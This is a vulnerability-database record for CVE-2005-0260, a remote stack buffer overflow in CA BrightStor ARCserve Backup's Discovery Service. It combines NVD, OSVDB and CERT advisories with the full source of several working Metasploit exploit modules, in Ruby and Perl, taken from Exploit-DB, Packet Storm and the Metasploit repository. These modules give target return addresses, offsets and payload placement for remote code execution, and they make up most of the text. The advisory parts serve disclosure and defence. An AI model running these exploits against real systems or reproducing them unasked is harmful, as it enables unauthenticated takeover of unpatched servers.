ID CVE-2005-0260Type cveReporter NVDModified 2017-07-10T21:32:10
Description
Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.
{"id": "CVE-2005-0260", "bulletinFamily": "NVD", "title": "CVE-2005-0260", "description": "Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.", "published": "2005-05-02T00:00:00", "modified": "2017-07-10T21:32:10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260", "reporter": "NVD", "references": ["http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1", "http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities", "http://securitytracker.com/id?1013138", "https://exchange.xforce.ibmcloud.com/vulnerabilities/19251"], "cvelist": ["CVE-2005-0260"], "type": "cve", "lastseen": "2017-07-11T11:14:46", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1"], "cvelist": ["CVE-2005-0260"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.", "edition": 1, "enchantments": {}, "hash": "f55e90ecbe03d772ffd1ef1717098ba1457580a14c9b1fbbe8f7de504540d579", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a7c1fa94f4edbf2301b9bc8db07a9874", "key": "title"}, {"hash": "44f3f972f1219e5a5130d74f050ce136", "key": "published"}, {"hash": "235fd81ade99ad3d518b69e6f0eb898a", "key": "cpe"}, {"hash": "1ba25d5fd86624a97a3b2bf7198d508e", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "a8bdf6e67ebfac1b08e65c2af96d0301", "key": "modified"}, {"hash": "7e2613b49271c4d7be3d121b2cf2e99a", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3cb84a834510de183567ce26eba5e299", "key": "references"}, {"hash": "87e53a54faa92dae28db14d708aa83be", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260", "id": "CVE-2005-0260", "lastseen": "2016-09-03T05:05:27", "modified": "2008-09-05T16:45:47", "objectVersion": "1.2", "published": "2005-05-02T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/19251", "http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1", "http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities", "http://securitytracker.com/id?1013138"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-0260", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T05:05:27"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "235fd81ade99ad3d518b69e6f0eb898a"}, {"key": "cvelist", "hash": "7e2613b49271c4d7be3d121b2cf2e99a"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "1ba25d5fd86624a97a3b2bf7198d508e"}, {"key": "href", "hash": "87e53a54faa92dae28db14d708aa83be"}, {"key": "modified", "hash": "7cca64543a2de89cb81b5ec8a12bb841"}, {"key": "published", "hash": "44f3f972f1219e5a5130d74f050ce136"}, {"key": "references", "hash": "d8d69c3a400ceb1f96a54a4093408ca3"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a7c1fa94f4edbf2301b9bc8db07a9874"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "97adbd3a0ba481cd98af1a30f95407f1258245052db77d73c2180382474d8f28", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-11T11:14:46"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:13613"]}, {"type": "exploitdb", "idList": ["EDB-ID:16406"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83122", "PACKETSTORM:36062"]}, {"type": "canvas", "idList": ["BRIGHTSTOR_DISCOVERY"]}, {"type": "cert", "idList": ["VU:864801"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/DISCOVERY_UDP"]}], "modified": "2017-07-11T11:14:46"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundries resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nThe ARCserver Backup server uses a Discovery server to detect other backup servers on the local network. The Discovery service listens on UDP port 41524. While the Discovery service can accept packets up to 4k bytes (via the recvfrom() call), it copies this data to a smaller (1k byte) buffer to be processed.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Computer Associate has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundries resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ca.com/\n[Vendor Specific Advisory URL](http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO62769&os=NT&returninput=0)\nSecurity Tracker: 1013138\n[Secunia Advisory ID:14183](https://secuniaresearch.flexerasoftware.com/advisories/14183/)\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities&flashstatus=true\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html\nKeyword: UDP Port 41524\n[CVE-2005-0260](https://vulners.com/cve/CVE-2005-0260)\n", "modified": "2004-12-20T09:11:53", "published": "2004-12-20T09:11:53", "href": "https://vulners.com/osvdb/OSVDB:13613", "id": "OSVDB:13613", "title": "CA BrightStor ARCserve Backup Discovery Service Buffer Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:47:53", "bulletinFamily": "exploit", "description": "CA BrightStor Discovery Service Stack Buffer Overflow. CVE-2005-0260. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16406", "href": "https://www.exploit-db.com/exploits/16406/", "type": "exploitdb", "title": "CA BrightStor Discovery Service Stack Buffer Overflow", "sourceData": "##\r\n# $Id: discovery_udp.rb 9263 2010-05-09 17:52:51Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\r\n\t\t\t\tDiscovery Service. This vulnerability occurs when a large\r\n\t\t\t\trequest is sent to UDP port 41524, triggering a stack buffer\r\n\t\t\t\toverflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm', 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9263 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0260'],\r\n\t\t\t\t\t[ 'OSVDB', '13613'],\r\n\t\t\t\t\t[ 'BID', '12491'],\r\n\t\t\t\t\t[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'cheyprod.dll 12/12/2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x23808eb0, # call to edi reg\r\n\t\t\t\t\t\t\t'Offset' => 968,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'cheyprod.dll 07/21/2004',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x2380a908, # call edi\r\n\t\t\t\t\t\t\t'Offset' => 970,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 20 2004',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(41524)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\t# The first request should have no reply\r\n\t\tcsock = Rex::Socket::Tcp.create(\r\n\t\t\t'PeerHost' => datastore['RHOST'],\r\n\t\t\t'PeerPort' => 41523,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tcsock.put('META')\r\n\t\tx = csock.get_once(-1, 3)\r\n\t\tcsock.close\r\n\r\n\t\t# The second request should be replied with the host name\r\n\t\tcsock = Rex::Socket::Tcp.create(\r\n\t\t\t'PeerHost' => datastore['RHOST'],\r\n\t\t\t'PeerPort' => 41523,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tcsock.put('hMETA')\r\n\t\ty = csock.get_once(-1, 3)\r\n\t\tcsock.close\r\n\r\n\t\tif (y and not x)\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tbuf = rand_text_english(4096)\r\n\r\n\t\t# Target 0:\r\n\t\t#\r\n\t\t# esp @ 971\r\n\t\t# ret @ 968\r\n\t\t# edi @ 1046\r\n\t\t# end = 4092\r\n\r\n\t\tbuf[target['Offset'], 4] = [ target.ret ].pack('V')\r\n\t\tbuf[1046, payload.encoded.length] = payload.encoded\r\n\r\n\t\tudp_sock.put(buf)\r\n\t\tudp_sock.recvfrom(8192)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16406/"}], "cert": [{"lastseen": "2018-12-25T20:19:33", "bulletinFamily": "info", "description": "### Overview \n\nThe Computer Associates BrightStor ARCserve Backup Discovery Service contains a buffer overflow, which may allow a remote attacker to execute arbitrary code.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup is a cross-platform backup and recovery application. The ARCserve Backup Discovery Service fails to properly check incoming network traffic on 41524/udp, creating a buffer overflow vulnerability.\n\nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a system running the vulnerable software. \n \n--- \n \n### Solution \n\n**Upgrade or patch** \nUpgrade or install patches, as recommended by the [Computer Associates vulnerability 32056 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>). \n \n--- \n \n \n**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically 41524/udp). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n864801\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Computer Associates \n\nNotified: August 04, 2005 Updated: August 04, 2005 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [Computer Associates vulnerability 32056 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23864801 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>\n * <http://secunia.com/advisories/14183>\n * <http://xforce.iss.net/xforce/xfdb/19251>\n * <http://www.osvdb.org/displayvuln.php?osvdb_id=13613>\n\n### Credit\n\nThis vulnerability was reported by iDEFENSE, who in turn credits Patrik Karlsson and an anonymous source. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0260](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260>) \n---|--- \n**Severity Metric:****** | 39.38 \n**Date Public:** | 2005-02-09 \n**Date First Published:** | 2005-08-04 \n**Date Last Updated: ** | 2005-08-11 19:07 UTC \n**Document Revision: ** | 7 \n", "modified": "2005-08-11T19:07:00", "published": "2005-08-04T00:00:00", "id": "VU:864801", "href": "https://www.kb.cert.org/vuls/id/864801", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup Discovery Service vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:31", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83122/CA-BrightStor-Discovery-Service-Overflow.html", "id": "PACKETSTORM:83122", "type": "packetstorm", "title": "CA BrightStor Discovery Service Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor Discovery Service Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the CA BrightStor \nDiscovery Service. This vulnerability occurs when a large \nrequest is sent to UDP port 41524, triggering a stack \noverflow. \n}, \n'Author' => [ 'hdm', 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0260'], \n[ 'OSVDB', '13613'], \n[ 'BID', '12491'], \n[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'], \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ \n'cheyprod.dll 12/12/2003', \n{ \n'Platform' => 'win', \n'Ret' => 0x23808eb0, # call to edi reg \n'Offset' => 968, \n}, \n], \n[ \n'cheyprod.dll 07/21/2004', \n{ \n'Platform' => 'win', \n'Ret' => 0x2380a908, # call edi \n'Offset' => 970, \n}, \n], \n], \n'DisclosureDate' => 'Dec 20 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(41524) \n], self.class) \nend \n \ndef check \n \n# The first request should have no reply \ncsock = Rex::Socket::Tcp.create( \n'PeerHost' => datastore['RHOST'], \n'PeerPort' => 41523, \n'Context' => \n{ \n'Msf' => framework, \n'MsfExploit' => self, \n}) \n \ncsock.put('META') \nx = csock.get_once(-1, 3) \ncsock.close \n \n# The second request should be replied with the host name \ncsock = Rex::Socket::Tcp.create( \n'PeerHost' => datastore['RHOST'], \n'PeerPort' => 41523, \n'Context' => \n{ \n'Msf' => framework, \n'MsfExploit' => self, \n}) \n \ncsock.put('hMETA') \ny = csock.get_once(-1, 3) \ncsock.close \n \nif (y and not x) \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_udp \n \nprint_status(\"Trying target #{target.name}...\") \n \nbuf = rand_text_english(4096) \n \n# Target 0: \n# \n# esp @ 971 \n# ret @ 968 \n# edi @ 1046 \n# end = 4092 \n \nbuf[target['Offset'], 4] = [ target.ret ].pack('V') \nbuf[1046, payload.encoded.length] = payload.encoded \n \nudp_sock.put(buf) \nudp_sock.recvfrom(8192) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83122/discovery_udp.rb.txt"}, {"lastseen": "2016-12-05T22:17:43", "bulletinFamily": "exploit", "description": "", "modified": "2005-02-18T00:00:00", "published": "2005-02-18T00:00:00", "id": "PACKETSTORM:36062", "href": "https://packetstormsecurity.com/files/36062/cabrightstor_disco.pm.html", "type": "packetstorm", "title": "cabrightstor_disco.pm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::cabrightstor_disco; \nuse base \"Msf::Exploit\"; \nuse strict; \nuse Pex::Text; \n \nmy $advanced = { }; \n \nmy $info = \n{ \n'Name' => 'CA BrightStor Discovery Service Overflow', \n'Version' => '$Revision: 1.10 $', \n'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ], \n'Priv' => 1, \n'AutoOpts' => { 'EXITFUNC' => 'process' }, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 41524], \n}, \n \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500 \n'Keys' => ['+ws2ord'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a vulnerability in the CA BrightStor \nDiscovery Service. This vulnerability occurs when a large \nrequest is sent to UDP port 41524, triggering a stack \noverflow. \n}), \n \n'Refs' => \n[ \n['BID', '12491'], \n['CVE', '2005-0260'], \n['URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'] \n], \n \n'Targets' => \n[ \n['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg \n], \n \n'Keys' => ['brightstor'], \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \nreturn($self); \n} \n \nsub Check { \nmy $self = shift; \nmy $target_host = $self->GetVar('RHOST'); \nmy $target_port = 41523; \n \n# Connection #1 should not receive a response \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$s->Send(\"META\"); \nmy $res = $s->Recv(-1, 1); \n$s->Close; \n \nif ($res) { \n$self->PrintLine(\"[*] The discovery returned a strange response: $res\"); \n} \n \n# Connection #2 should receive the hostname of the target \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$s->Send(\"hMETA\"); \nmy $res = $s->Recv(-1, 1); \n$s->Close; \n \nif (! $res) { \n$self->PrintLine(\"[*] The discovery service did not respond to our query\"); \nreturn $self->CheckCode('Generic'); \n} \n \n$self->PrintLine(\"[*] Discovery service active on host: $res\"); \nreturn $self->CheckCode('Detected'); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $target_host = $self->GetVar('RHOST'); \nmy $target_port = $self->GetVar('RPORT'); \nmy $target_idx = $self->GetVar('TARGET'); \nmy $shellcode = $self->GetVar('EncodedPayload')->Payload; \nmy $target = $self->Targets->[$target_idx]; \n \n$self->PrintLine(\"[*] Attempting to exploit target \" . $target->[0]); \n \nmy $s = Msf::Socket::Udp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn; \n} \n \nmy $bang = \"X\" x 4096; \n \n# esp @ 971 \n# ret @ 968 \n# edi @ 1046 \n# end = 4092 \n \nsubstr($bang, 968, 4, pack('V', $target->[1])); \nsubstr($bang, 1046, length($shellcode), $shellcode); \n \n$self->PrintLine(\"[*] Sending \" .length($bang) . \" bytes to remote host.\"); \n$s->Send($bang); \n$s->Recv(-1, 5); \n \nreturn; \n} \n \n1; \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/36062/cabrightstor_disco.pm"}], "canvas": [{"lastseen": "2016-09-25T14:12:54", "bulletinFamily": "exploit", "description": "**Name**| brightstor_discovery \n---|--- \n**CVE**| CVE-2005-0260 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CA BrightStor ARCserve Backup Discovery Service Overflow \n**Notes**| CVE Name: CVE-2005-0260 \nVENDOR: Computer Associates \nVersionsAffected: \nRepeatability: \nReferences: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=194 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260 \nDate public: 02/09/05 \nCVSS: 10.0 \n\n", "modified": "2005-05-02T00:00:00", "published": "2005-05-02T00:00:00", "id": "BRIGHTSTOR_DISCOVERY", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/brightstor_discovery", "type": "canvas", "title": "Immunity Canvas: BRIGHTSTOR_DISCOVERY", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-11T06:50:46", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow.", "modified": "2017-11-08T16:00:24", "published": "2005-12-05T04:57:41", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/DISCOVERY_UDP", "href": "", "type": "metasploit", "title": "CA BrightStor Discovery Service Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a large\n request is sent to UDP port 41524, triggering a stack buffer\n overflow.\n },\n 'Author' => [ 'hdm', 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0260'],\n [ 'OSVDB', '13613'],\n [ 'BID', '12491'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2048,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'cheyprod.dll 12/12/2003',\n {\n 'Platform' => 'win',\n 'Ret' => 0x23808eb0, # call to edi reg\n 'Offset' => 968,\n },\n ],\n [\n 'cheyprod.dll 07/21/2004',\n {\n 'Platform' => 'win',\n 'Ret' => 0x2380a908, # call edi\n 'Offset' => 970,\n },\n ],\n ],\n 'DisclosureDate' => 'Dec 20 2004',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(41524)\n ])\n end\n\n def check\n\n # The first request should have no reply\n csock = Rex::Socket::Tcp.create(\n 'PeerHost' => datastore['RHOST'],\n 'PeerPort' => 41523,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n })\n\n csock.put('META')\n x = csock.get_once(-1, 3)\n csock.close\n\n # The second request should be replied with the host name\n csock = Rex::Socket::Tcp.create(\n 'PeerHost' => datastore['RHOST'],\n 'PeerPort' => 41523,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n })\n\n csock.put('hMETA')\n y = csock.get_once(-1, 3)\n csock.close\n\n if (y and not x)\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect_udp\n\n print_status(\"Trying target #{target.name}...\")\n\n buf = rand_text_english(4096)\n\n # Target 0:\n #\n # esp @ 971\n # ret @ 968\n # edi @ 1046\n # end = 4092\n\n buf[target['Offset'], 4] = [ target.ret ].pack('V')\n buf[1046, payload.encoded.length] = payload.encoded\n\n udp_sock.put(buf)\n udp_sock.recvfrom(8192)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/discovery_udp.rb"}]}
